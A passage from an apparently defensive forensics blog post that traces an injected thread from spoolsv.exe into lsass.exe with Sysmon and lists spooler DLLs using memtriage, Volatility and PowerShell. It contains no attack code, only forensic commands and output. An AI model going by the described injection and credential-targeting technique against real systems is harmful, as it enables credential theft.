class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">NewThreadId: 1864</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font color="#04ff00">StartAddress: 0x000000A0FF660000</font></span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">StartModule: -</span></p><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;">StartFunction: -</span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">And above we see that </font><font face="courier">spoolsv.exe</font><font face="inherit"> calls </font><font face="courier">CreateRemoteThread()</font><font face="inherit"> against </font><font face="courier">lsass.exe</font><font face="inherit">, which is the Local Security Authority Subsystem Service and handles security policy enforcement, password changes, authentication, and the like. When attackers want to dump credentials on Windows, they often do so by attacking </font><font face="courier">lsass</font><font face="inherit">.</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">There is other data that Sysmon could give us. If we were running it with Image Loads configured, which creates a ton of noise, it would show us what dlls are loaded into processes and when. If it were configured to do this on this endpoint, we would see a handful of dlls loaded into the </font><font face="courier">spoolsv.exe</font><font face="inherit"> process shortly after our third </font><font face="courier">PowerShell</font><font face="inherit"> process opened a new thread in the spooler service.</font></span></div><h2 style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;">See More: Memtriage</span></h2><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">We can see this using <a href="https://twitter.com/gleeda" target="_blank">gleeda's</a> <a href="https://github.com/gleeda/memtriage" target="_blank">memtriage</a> in combination with supported <a href="https://www.volatilityfoundation.org/" target="_blank">Volatility</a> plugins. For my investigation, I downloaded </font><font face="courier">memtriage</font><font face="inherit"> to the victim system and started with this command:</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s1" style="font-variant-ligatures: no-common-ligatures;"><font size="2">.\memtriage.exe --pid 1120 --output csv --plugins dlllist --outfile dlllist_1120.csv</font></span></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">To quickly review the output, I used PowerShell and created a variable that assigned each CSV to an object as follows:</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #ecec15; font-family: monaco; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><font size="2"><span class="s1" style="color: #2ee721; font-variant-ligatures: no-common-ligatures;">$dlllist</span><span class="s2" style="color: #cccccc; font-variant-ligatures: no-common-ligatures;"> </span><span class="s3" style="color: #828282; font-variant-ligatures: no-common-ligatures;">=</span><span class="s2" style="color: #cccccc; font-variant-ligatures: no-common-ligatures;"> </span><span class="s4" style="font-variant-ligatures: no-common-ligatures;">Get-Content</span><span class="s2" style="color: #cccccc; font-variant-ligatures: no-common-ligatures;"> ./dlllist_1120.csv | </span><span class="s4" style="font-variant-ligatures: no-common-ligatures;">ConvertFrom-Csv</span></font></p></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit"><br /></font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><span style="background-color: white; font-variant-ligatures: no-common-ligatures;"><font face="inherit">And then I selected the specific properties from those objects as follows:</font></span></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><br /></div><div style="-webkit-text-stroke-width: 0px; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;"><p class="p1" style="background-color: rgba(0, 0, 0, 0.85); color: #cccccc; font-family: monaco; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><font size="2"><span class="s1" style="color: #2ee721; font-variant-ligatures: no-common-ligatures;">$dlllist</span><span class="s2" style="font-variant-ligatures: no-common-ligatures;"> | </span><span class="s3" style="color: #ecec15; font-variant-ligatures: no-common-ligatures;">Select-Object</span><span class="s2" style="font-variant-ligatures: no-common-ligatures;"> </span><span class="s4" style="color: #828282; font-variant-ligatures: no-common-ligatures;">-Property</span><span class="s2" style="font-variant-ligatures: no-common-ligatures;"> LoadTime</span><span class="s4" style="color: #828282; font-variant-ligatures: no-common-ligatures;">,</span><span class="s2" style="font-variant-ligatures: no-common-ligatures;">Path</span></font></p><p class="p2" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px; min-height: 14px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;"></span><br /></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">LoadTime <span class="Apple-converted-space"> </span>Path</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">-------- <span class="Apple-converted-space"> </span>----</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:17:36 UTC+0000 C:\Windows\System32\spoolsv.exe</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:17:36 UTC+0000 C:\Windows\SYSTEM32\ntdll.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:17:36 UTC+0000 C:\Windows\system32\KERNEL32.DLL</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:17:36 UTC+0000 C:\Windows\system32\KERNELBASE.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:17:36 UTC+0000 C:\Windows\system32\USER32.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:17:36 UTC+0000 C:\Windows\system32\msvcrt.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:17:36 UTC+0000 C:\Windows\SYSTEM32\sechost.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:17:36 UTC+0000 C:\Windows\system32\RPCRT4.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:17:36 UTC+0000 C:\Windows\System32\DNSAPI.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:17:36 UTC+0000 C:\Windows\SYSTEM32\powrprof.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:17:36 UTC+0000 C:\Windows\system32\GDI32.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:17:36 UTC+0000 C:\Windows\system32\WS2_32.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:17:36 UTC+0000 C:\Windows\system32\NSI.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:17:36 UTC+0000 C:\Windows\SYSTEM32\combase.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:17:36 UTC+0000 C:\Windows\System32\CRYPTBASE.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:17:36 UTC+0000 C:\Windows\System32\bcryptPrimitives.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:17:36 UTC+0000 C:\Windows\System32\sspicli.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\clusapi.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\cryptdll.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\SYSTEM32\advapi32.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\IPHLPAPI.DLL</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\WINNSI.DLL</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\system32\mswsock.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\rasadhlp.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\fwpuclnt.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\localspl.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\system32\CRYPT32.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\srvcli.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\SYSTEM32\cfgmgr32.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\CRYPTSP.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\SPOOLSS.DLL</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\system32\WINTRUST.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\system32\SETUPAPI.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\bcrypt.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\system32\MSASN1.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\system32\DEVOBJ.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\system32\winspool.drv</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\PrintIsolationProxy.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\tcpmon.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\snmpapi.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\wsnmp32.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\usbmon.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\system32\OLEAUT32.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\WSDMon.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\wsdapi.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\webservices.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\FirewallAPI.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\SYSTEM32\clbcatq.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\FunDisc.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\XmlLite.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\fdPnp.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\ATL.DLL</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\System32\drvstore.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: normal; font-variant-east-asian: normal; font-variant-numeric: normal; line-height: normal; margin: 0px;"><span class="s2" style="font-variant-ligatures: no-common-ligatures;">2020-07-19 03:18:12 UTC+0000 C:\Windows\system32\spool\PRTPROCS\x64\winprint.dll</span></p><p class="p3" style="background-color: rgba(0, 0, 0, 0.85); color: #f4f4f4; font-family: monaco; font-size: 10px; font-stretch: 